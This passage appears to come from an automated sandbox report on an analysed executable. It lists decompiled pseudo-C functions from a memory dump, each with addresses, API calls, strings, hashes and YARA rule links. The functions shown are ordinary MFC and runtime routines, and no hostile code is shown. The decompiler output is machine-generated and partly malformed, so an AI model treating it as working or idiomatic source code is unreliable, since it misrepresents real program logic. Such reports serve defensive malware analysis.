								E004177BE(_t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E004177BE(_t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E0042569C(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}

0x00420604
0x00420604
0x00420604
0x0042060a
0x00420611
0x00420618
0x0042061e
0x00420621
0x0042062a
0x0042062b
0x00420634
0x00420642
0x00420645
0x0042064d
0x00420663
0x00420665
0x00420668
0x00420670
0x0042066a
0x0042066a
0x0042066a
0x0042067f
0x004206fd
0x004206fd
0x00420681
0x00420696
0x0042069b
0x0042069e
0x00000000
0x004206a0
0x004206a1
0x004206a7
0x004206ac
0x004206ae
0x004206b4
0x004206b9
0x004206bd
0x004206bd
0x004206c1
0x004206c5
0x004206c8
0x004206cc
0x004206cf
0x004206d6
0x004206d9
0x004206e1
0x004206db
0x004206db
0x004206db
0x004206e8
0x0042070d
0x00420714
0x0042071d
0x00420725
0x00420732
0x00420735
0x0042073b
0x00420741
0x004206ef
0x004206ef
0x004206f6
0x004206fb
0x00420705
0x0042070a
0x00000000
0x00000000
0x00000000
0x00000000
0x004206fb
0x004206e8
0x0042069e
0x00420742
0x00420743
0x00420623
0x00420623
0x00420623
0x00420750

APIs

GlobalLock.KERNEL32 ref: 0042062E
lstrlenA.KERNEL32(?), ref: 00420676
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00420690

Strings

System, xrefs: 0042062A

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharGlobalLockMultiWidelstrlen
String ID: System
API String ID: 1529587224-3470857405
Opcode ID: 38601b7ba2dda2826b863afb526998b0af5bb2d61a90e5abe355db9518e830ad
Instruction ID: 12ab0085a7937c9f5ce84e73a832f34c35628f34696d3be23f28e3815e9ea354
Opcode Fuzzy Hash: 38601b7ba2dda2826b863afb526998b0af5bb2d61a90e5abe355db9518e830ad
Instruction Fuzzy Hash: B6410671E00225DFCB04DFB4D885AAEB7F5FF44304F64812AE412DB286E774A955CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00404BE0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404BE0(intOrPtr __ecx, void* __edx, signed int _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t45;
				signed int _t48;
				signed int _t50;
				intOrPtr* _t52;
				intOrPtr* _t53;
				intOrPtr _t55;
				signed int _t60;
				unsigned int _t66;
				intOrPtr* _t68;
				unsigned int _t72;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t87;
				signed int _t91;
				signed int _t96;
				intOrPtr _t97;
				void* _t98;

				_t94 = _t96;
				_push(0xffffffff);
				_push(E0043B840);
				_push( *[fs:0x0]);
				_t97 = _t96 - 0x1c;
				_t45 =  *0x44f5d0; // 0x765b253d
				_push(_t45 ^ _t96);
				 *[fs:0x0] =  &_v16;
				_v20 = _t97;
				_t87 = __ecx;
				_v24 = __ecx;
				_t48 = _a4;
				_t91 = _t48 | 0x0000000f;
				if(_t91 <= 0xfffffffe) {
					_t66 =  *(__ecx + 0x18);
					_t48 = 0xaaaaaaab * _t91;
					_t72 = _t66 >> 1;
					_t83 = 0xaaaaaaab * _t91 >> 0x20 >> 1;
					__eflags = 0xaaaaaaab * _t91 >> 0x20 >> 1 - _t72;
					if(__eflags < 0) {
						_t48 = 0xfffffffe - _t72;
						__eflags = _t66 - 0xfffffffe;
						if(__eflags <= 0) {
							_t91 = _t72 + _t66;
						}
					}
				} else {
					_t91 = _t48;
				}
				_t73 = _t91 + 1;
				_v8 = 0;
				if(_t73 > 0) {
					_t50 = _t48 | 0xffffffff;
					_t83 = _t50 % _t73;
					__eflags = _t50 / _t73 - 1;
					if(__eflags >= 0) {
						goto L7;
					} else {
						_v28 = 0;
						E00425E86( &_v44, _t83,  &_v28);
						_v44 = 0x44257c;
						E00429326( &_v44, 0x44ae50);
						_t60 = _a4;
						_a4 = _t60;
						_t61 = _t60 + 1;
						__eflags = _t60 + 1;
						_v20 = _t97;
						_v8 = 2;
						_v32 = E00404E80(0, _t91, _t94, _t61);
						_v8 = 1;
						return E00404CBE;
					}
				} else {
					_t73 = 0;
					L7:
					_t52 = E0040A3C7(0, _t73);
					_t98 = _t97 + 4;
					_t68 = _t52;
					_v8 = 0xffffffff;
					_t74 = _a8;
					if(_t74 > 0) {
						if( *(_t87 + 0x18) < 0x10) {
							_t55 = _t87 + 4;
						} else {
							_t55 =  *((intOrPtr*)(_t87 + 4));
						}
						E00425DFA(_t68, _t74, _t68, _t91 + 1, _t55, _t74);
						_t74 = _a8;
						_t98 = _t98 + 0x10;
					}
					_t106 =  *(_t87 + 0x18) - 0x10;
					if( *(_t87 + 0x18) >= 0x10) {
						_push( *((intOrPtr*)(_t87 + 4)));
						E0040A3F2(_t68, _t83, _t87, _t91, _t106);
						_t74 = _a8;
					}
					_t53 = _t87 + 4;
					 *_t53 = 0;
					 *_t53 = _t68;
					 *(_t87 + 0x18) = _t91;
					 *((intOrPtr*)(_t87 + 0x14)) = _t74;
					if(_t91 >= 0x10) {
						_t53 = _t68;
					}
					 *((char*)(_t53 + _t74)) = 0;
					 *[fs:0x0] = _v16;
					return _t53;
				}
			}

0x00404be1
0x00404be3
0x00404be5
0x00404bf0
0x00404bf1
0x00404bf7
0x00404bfe
0x00404c02
0x00404c08
0x00404c0b
0x00404c0d
0x00404c10
0x00404c15
0x00404c1b
0x00404c21
0x00404c29
0x00404c2d
0x00404c2f
0x00404c31
0x00404c33
0x00404c3a
0x00404c3c
0x00404c3e
0x00404c40
0x00404c40
0x00404c3e
0x00404c1d
0x00404c1d
0x00404c1d
0x00404c45
0x00404c4a
0x00404c4d
0x00404c65
0x00404c6a
0x00404c6c
0x00404c6f
0x00000000
0x00404c71
0x00404c78
0x00404c7b
0x00404c89
0x00404c90
0x00404c95
0x00404c9b
0x00404c9e
0x00404c9e
0x00404ca1
0x00404ca5
0x00404cae
0x00404cb1
0x00404cbd
0x00404cbd
0x00404c4f
0x00404c4f
0x00404c51
0x00404c52
0x00404c57
0x00404c5a
0x00404c5c
0x00404cc7
0x00404ccc
0x00404cd2
0x00404cd9
0x00404cd4
0x00404cd4
0x00404cd4
0x00404ce3
0x00404ce8
0x00404ceb
0x00404ceb
0x00404cee
0x00404cf2
0x00404cf7
0x00404cf8
0x00404cfd
0x00404d00
0x00404d06
0x00404d09
0x00404d0c
0x00404d0e
0x00404d11
0x00404d14
0x00404d16
0x00404d16
0x00404d18
0x00404d1f
0x00404d2d
0x00404d2d

APIs

std::exception::exception.LIBCMT ref: 00404C7B
__CxxThrowException@8.LIBCMT ref: 00404C90
_memcpy_s.LIBCMT ref: 00404CE3

Strings

=%[v, xrefs: 00404BE0
|%D, xrefs: 00404C89

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw_memcpy_sstd::exception::exception
String ID: =%[v$|%D
API String ID: 464988439-491626134
Opcode ID: 9ce808b5556bd732d7109ad04ed7be6e872bd1d4b2e975bef16e66acf2468e85
Instruction ID: 60c8eee6bf82f68e9cb2171cbe7560a0f9cea5bb4dcc51287f9e85b9e92e644a
Opcode Fuzzy Hash: 9ce808b5556bd732d7109ad04ed7be6e872bd1d4b2e975bef16e66acf2468e85
Instruction Fuzzy Hash: 3A4106B1A04605AFDB04DF69C98069EB7B4FB84310F10423FE926A73C0D775AA40CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 0041871A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0041871A(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, CHAR* __esi, void* __eflags) {
				intOrPtr _t33;
				struct HINSTANCE__* _t44;
				signed int _t45;
				_Unknown_base(*)()* _t47;
				intOrPtr _t54;
				intOrPtr _t59;
				void* _t75;
				void* _t78;

				_t77 = __esi;
				_t76 = __edi;
				_t75 = __edx;
				_push(0x20);
				E00427243(E0043A8F2, __ebx, __edi, __esi);
				_t59 = __ecx;
				 *((intOrPtr*)(_t78 - 0x2c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x43f1f4;
				_t33 =  *((intOrPtr*)(__ecx + 0x44));
				 *(_t78 - 4) = 2;
				 *((intOrPtr*)(_t78 - 0x24)) = _t33;
				if(_t33 == 0) {
					L7:
					if( *((intOrPtr*)(_t59 + 0x4c)) == 0) {
						L12:
						E00421664(_t59, _t59 + 0x24, _t75, _t76);
						E00421C36(_t59 + 0x64);
						 *(_t78 - 0x20) =  *(_t78 - 0x20) & 0x00000000;
						_push(_t78 - 0x20);
						if(E00421DE6(_t59, 0x441e94) >= 0) {
							_t77 = "mfcm80.dll";
							_t76 = _t78 - 0x1c;
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							_t44 = GetModuleHandleA(_t78 - 0x1c);
							if(_t44 != 0) {
								_t47 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
								if(_t47 != 0) {
									 *_t47( *(_t78 - 0x20));
								}
							}
							_t45 =  *(_t78 - 0x20);
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						 *(_t78 - 4) = 1;
						E00421A04(_t59 + 0x40);
						 *(_t78 - 4) = 0;
						E00421839(_t59, _t59 + 0x24, _t75, _t76);
						 *(_t78 - 4) =  *(_t78 - 4) | 0xffffffff;
						E0040CD77(_t59);
						return E004272C6(_t59, _t76, _t77);
					}
					_t76 = _t59 + 0x40;
					do {
						_t77 = E0042194B(_t76);
						_t86 = _t77;
						if(_t77 != 0) {
							E00417EE2(_t77);
							_push(_t77);
							E0040A3F2(_t59, _t75, _t76, _t77, _t86);
						}
					} while ( *((intOrPtr*)(_t59 + 0x4c)) != 0);
					goto L12;
				} else {
					_t76 = __ecx + 0x40;
					do {
						 *((intOrPtr*)(_t78 - 0x28)) = _t33;
						_t77 =  *((intOrPtr*)(E0040B523(_t78 - 0x24)));
						if(_t77 != 0) {
							_t54 =  *((intOrPtr*)(_t77 + 4));
							if(_t54 != 0) {
								_t83 =  *((intOrPtr*)(_t54 + 0x90));
								if( *((intOrPtr*)(_t54 + 0x90)) == 0) {
									E0042197C(_t76,  *((intOrPtr*)(_t78 - 0x28)));
									E00417EE2(_t77);
									_push(_t77);
									E0040A3F2(_t59, _t75, _t76, _t77, _t83);
								}
							}
						}
						_t33 =  *((intOrPtr*)(_t78 - 0x24));
					} while (_t33 != 0);
					goto L7;
				}
			}

0x0041871a
0x0041871a
0x0041871a
0x0041871a
0x00418721
0x00418726
0x00418728
0x0041872b
0x00418731
0x00418736
0x0041873d
0x00418740
0x00418788
0x0041878c
0x004187b2
0x004187b5
0x004187be
0x004187c3
0x004187ca
0x004187d9
0x004187db
0x004187e0
0x004187e3
0x004187e4
0x004187e5
0x004187eb
0x004187ec
0x004187f4
0x004187fc
0x00418804
0x00418809
0x0041880b
0x00418804
0x0041880c
0x00418812
0x00418812
0x00418818
0x0041881c
0x00418824
0x00418828
0x0041882d
0x00418833
0x0041883d
0x0041883d
0x0041878e
0x00418791
0x00418798
0x0041879a
0x0041879c
0x004187a0
0x004187a5
0x004187a6
0x004187ab
0x004187ac
0x00000000
0x00418742
0x00418742
0x00418745
0x00418745
0x00418753
0x00418757
0x00418759
0x0041875e
0x00418760
0x00418767
0x0041876e
0x00418775
0x0041877a
0x0041877b
0x00418780
0x00418767
0x0041875e
0x00418781
0x00418784
0x00000000
0x00418745

APIs

__EH_prolog3_GS.LIBCMT ref: 00418721
GetModuleHandleA.KERNEL32(?,00441E94,00000000,?), ref: 004187EC
GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 004187FC

Strings

MFCM80ReleaseManagedReferences, xrefs: 004187F6
mfcm80.dll, xrefs: 004187DB

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressH_prolog3_HandleModuleProc
String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
API String ID: 2418878492-2500072749
Opcode ID: ce024f57dd1663924f17bb5b9e697a7b54cd5d98f2af20a65992e52f207756d7
Instruction ID: 6087722dc38ad4aacf6c46ce711b78dce545afc184d9c30f9304097a231e4adc
Opcode Fuzzy Hash: ce024f57dd1663924f17bb5b9e697a7b54cd5d98f2af20a65992e52f207756d7
Instruction Fuzzy Hash: 4B316070A00214CBCF15EFA5D881BEE77A5AF18304F6440AEE811AB292DF7CDD45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00418E77, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
comCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00418E77(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t49;
				signed int _t60;
				signed int _t64;
				signed int _t67;
				signed int _t80;
				signed int _t86;
				intOrPtr* _t90;
				void* _t91;

				_t74 = __ebx;
				_push(0x80);
				E00427243(E0043A984, __ebx, __edi, __esi);
				_t49 =  *((intOrPtr*)(_t91 + 8));
				_t90 = __ecx;
				 *((intOrPtr*)(_t91 - 0x50)) = 0;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x43dea4;
				 *(_t91 - 4) = 0;
				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
					if(E004182D7(_t91 - 0x54, 0x11) != 0 || E004182D7(_t91 - 0x54, 0xd) != 0) {
						_t49 = _t91 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t90 + 0x64)) = 0;
					}
				} else {
					L6:
					_t11 = _t49 + 4; // 0x41c609
					GetObjectA( *_t11, 0x3c, _t91 - 0x4c);
					_push(_t91 - 0x30);
					 *(_t91 - 0x78) = 0x20;
					E00415700(_t74, _t91 - 0x58, 0, _t90, __eflags);
					 *((intOrPtr*)(_t91 - 0x74)) =  *((intOrPtr*)(_t91 - 0x58));
					 *((short*)(_t91 - 0x68)) =  *((intOrPtr*)(_t91 - 0x3c));
					 *(_t91 - 0x66) =  *(_t91 - 0x35) & 0x000000ff;
					 *(_t91 - 0x64) =  *(_t91 - 0x38) & 0x000000ff;
					 *(_t91 - 0x60) =  *(_t91 - 0x37) & 0x000000ff;
					 *(_t91 - 0x5c) =  *(_t91 - 0x36) & 0x000000ff;
					_t60 =  *(_t91 - 0x4c);
					__eflags = _t60;
					 *(_t91 - 4) = 1;
					_t74 = _t60;
					if(__eflags < 0) {
						_t74 =  ~_t60;
					}
					E00414208(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					 *(_t91 - 4) = 2;
					_t80 = GetDeviceCaps( *(_t91 - 0x84), 0x5a);
					_t64 = _t74 * 0xafc80;
					asm("cdq");
					_t86 = _t64 % _t80;
					_t90 = _t90 + 0x64;
					 *((intOrPtr*)(_t91 - 0x6c)) = 0;
					 *(_t91 - 0x70) = _t64 / _t80;
					E00421C36(_t90);
					_t67 = _t91 - 0x78;
					__imp__#420(_t67, 0x441ee4, _t90,  *((intOrPtr*)(_t90 + 0x20)));
					__eflags = _t67;
					if(__eflags < 0) {
						 *_t90 = 0;
					}
					 *(_t91 - 4) = 1;
					E0041425C(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					__eflags =  *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0;
					E00401E60( *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0, _t86);
				}
				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x43de94;
				E00414400(_t91 - 0x54);
				return E004272C6(_t74, 0, _t90);
			}

0x00418e77
0x00418e77
0x00418e81
0x00418e86
0x00418e8b
0x00418e8d
0x00418e90
0x00418e99
0x00418e9c
0x00418eaf
0x00418ec7
0x00000000
0x00418ebf
0x00418ebf
0x00418ebf
0x00418eca
0x00418eca
0x00418ed0
0x00418ed3
0x00418edc
0x00418ee0
0x00418ee7
0x00418eef
0x00418ef6
0x00418eff
0x00418f07
0x00418f0e
0x00418f15
0x00418f18
0x00418f1b
0x00418f1d
0x00418f21
0x00418f23
0x00418f27
0x00418f27
0x00418f32
0x00418f3f
0x00418f49
0x00418f4d
0x00418f53
0x00418f54
0x00418f56
0x00418f5a
0x00418f5d
0x00418f60
0x00418f6b
0x00418f6f
0x00418f75
0x00418f77
0x00418f79
0x00418f79
0x00418f81
0x00418f85
0x00418f8d
0x00418f90
0x00418f90
0x00418f95
0x00418f9c
0x00418fa3
0x00418fad

APIs

__EH_prolog3_GS.LIBCMT ref: 00418E81
GetObjectA.GDI32(0041C609,0000003C,?), ref: 00418ED3
GetDeviceCaps.GDI32(?,0000005A), ref: 00418F43
OleCreateFontIndirect.OLEAUT32(00000020,00441EE4), ref: 00418F6F

Strings

, xrefs: 00418EE0

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
String ID:
API String ID: 2429671754-3916222277
Opcode ID: f8a67d8bb4d6e6d7d38fda3f9cad975486aaec7c9b8741b20dfeebb5b57bc75d
Instruction ID: 232da4873634afa8946e6f52076fc517d976209c00a11014a9b5625df8a67a91
Opcode Fuzzy Hash: f8a67d8bb4d6e6d7d38fda3f9cad975486aaec7c9b8741b20dfeebb5b57bc75d
Instruction Fuzzy Hash: B8419C34E012489EDB10DFE5D901ADDFFF4AF28304F10815EE455EB291EB788A84CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF27, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040CF27(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a116, void* _a120) {
				void _v12;
				char _v16;
				intOrPtr _v20;
				int _v24;
				char _v124;
				char _v172;
				signed int _t25;
				unsigned int _t27;
				unsigned int _t31;
				int _t36;
				signed int* _t43;
				struct HBITMAP__* _t45;
				int _t48;
				void* _t49;
				unsigned int _t50;
				signed int _t53;
				void* _t56;
				signed char* _t57;
				signed int _t62;
				void* _t63;
				signed int _t66;
				signed short _t68;
				void* _t70;
				signed int _t72;

				_t56 = __edx;
				_t72 =  &_v124;
				_t25 =  *0x44f5d0; // 0x765b253d
				_a116 = _t25 ^ _t72;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t27 = GetMenuCheckMarkDimensions();
				_t48 = _t27;
				_t50 = _t27 >> 0x10;
				_v24 = _t50;
				if(_t48 <= 4 || _t50 <= 5) {
					_push(_t72);
					_push(_t50);
					_t22 =  &_v172; // 0x44e938
					_v172 = 0x44e9d0;
					E00429326(_t22, 0x448990);
					asm("int3");
					_t31 = _t50;
					 *(_t31 + 4) = 1;
					return _t31;
				} else {
					if(_t48 > 0x20) {
						_t48 = 0x20;
					}
					asm("cdq");
					_t66 = _t48 + 0xf >> 4;
					_t62 = (_t48 - 4 - _t56 >> 1) + (_t66 << 4) - _t48;
					if(_t62 > 0xc) {
						_t62 = 0xc;
					}
					_t36 = 0x20;
					if(_t50 > _t36) {
						_v24 = _t36;
					}
					E004277B0(_t62,  &_v12, 0xff, 0x80);
					_t43 = _t72 + (_v24 + 0xfffffffa >> 1) * _t66 * 2 - 0xc;
					_t57 = 0x43dd04;
					_v20 = _t66 + _t66;
					_v16 = 5;
					do {
						_t68 = ( *_t57 & 0x000000ff) << _t62;
						_t57 =  &(_t57[1]);
						_t53 =  !_t68 & 0x0000ffff;
						 *_t43 = _t53;
						_t43[0] = _t53;
						_t43 = _t43 + _v20;
						_t17 =  &_v16;
						 *_t17 = _v16 - 1;
					} while ( *_t17 != 0);
					_t45 = CreateBitmap(_t48, _v24, 1, 1,  &_v12);
					_pop(_t63);
					_pop(_t70);
					 *0x452830 = _t45;
					_pop(_t49);
					if(_t45 == 0) {
						 *0x452830 = _t45;
					}
					return E0042569C(_t45, _t49, _a116 ^ _t72, _t57, _t63, _t70);
				}
			}

0x0040cf27
0x0040cf28
0x0040cf32
0x0040cf39
0x0040cf3c
0x0040cf3d
0x0040cf3e
0x0040cf3f
0x0040cf45
0x0040cf4e
0x0040cf51
0x0040cf54
0x00415838
0x0041583b
0x00415841
0x00415845
0x0041584c
0x00415851
0x00415852
0x00415854
0x0041585b
0x0040cf60
0x0040cf63
0x0040cf67
0x0040cf67
0x0040cf6b
0x0040cf71
0x0040cf7f
0x0040cf84
0x0040cf88
0x0040cf88
0x0040cf8b
0x0040cf8e
0x0040cf90
0x0040cf90
0x0040cfa1
0x0040cfb7
0x0040cfbb
0x0040cfc0
0x0040cfc3
0x0040cfca
0x0040cfd0
0x0040cfd3
0x0040cfd7
0x0040cfda
0x0040cfdc
0x0040cfdf
0x0040cfe2
0x0040cfe2
0x0040cfe2
0x0040cff3
0x0040cffb
0x0040cffc
0x0040cffd
0x0040d002
0x0040d003
0x0040d011
0x0040d011
0x0040d024
0x0040d024

APIs

GetMenuCheckMarkDimensions.USER32 ref: 0040CF3F
_memset.LIBCMT ref: 0040CFA1
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0040CFF3
LoadBitmapA.USER32 ref: 0040D00B

Strings

, xrefs: 0040CF60

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: 1d5cad00afa336aaffbddcf4cdf22d6ed8b71d44c22b828f749b8a4dcf832728
Instruction ID: ff8a9b82f149e6bb8e36447a507e87552ebd01f97dd91890b82622f02b1772e5
Opcode Fuzzy Hash: 1d5cad00afa336aaffbddcf4cdf22d6ed8b71d44c22b828f749b8a4dcf832728
Instruction Fuzzy Hash: C331D472A0020A9BEF20DF78EDC5ABE7BA6EB44704F14063BE901EB2C1D634D904C755

Uniqueness

Uniqueness Score: -1.00%

Function 0040C1D0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C1D0(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E0040F2C9(__ecx, __eflags, _t26) == 0) {
					_t10 = E0041172F(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E0040F708(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E00416BE8(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

0x0040c1d0
0x0040c1d0
0x0040c1d2
0x0040c1d7
0x0040c1e0
0x0040c1e9
0x0040c1ee
0x0040c1f0
0x0040c1fc
0x0040c1fc
0x0040c203
0x0040c25e
0x00000000
0x0040c261
0x0040c205
0x0040c208
0x0040c20b
0x0040c212
0x0040c21c
0x0040c21e
0x00000000
0x00000000
0x0040c227
0x0040c22c
0x0040c22e
0x00000000
0x00000000
0x0040c235
0x0040c23b
0x0040c23d
0x0040c24a
0x0040c256
0x00000000
0x0040c256
0x0040c240
0x0040c246
0x0040c248
0x00000000
0x00000000
0x00000000
0x0040c248
0x0040c20d
0x0040c210
0x00000000
0x00000000
0x00000000
0x0040c210
0x0040c1f2
0x0040c1f6
0x00000000
0x00000000
0x00000000
0x0040c1f8
0x0040c1e2
0x00000000

Strings

Edit, xrefs: 0040C220

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: 6921a44342a32149d4a1c54dab2e1f699f62b3ccf61b0d2c03c7ef3c85b7d0c1
Instruction ID: 0fcbe3f62aec2f0407e477c9a08b7d44b01765e15394a0ef006839ba9e6c30f7
Opcode Fuzzy Hash: 6921a44342a32149d4a1c54dab2e1f699f62b3ccf61b0d2c03c7ef3c85b7d0c1
Instruction Fuzzy Hash: 3D01CE30A00201E6EA3027759C88B67B7A9AF51710F11067FF942F56E1CB7DE842E5AC

Uniqueness

Uniqueness Score: -1.00%

Function 004022A0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004022A0(struct HINSTANCE__* _a4, char _a8, signed int _a12) {
				void* _t7;
				void* _t11;
				struct HINSTANCE__* _t15;
				signed int _t17;
				struct HRSRC__* _t19;
				signed int _t21;

				_t15 = _a4;
				_t2 =  &_a8; // 0x765b253d
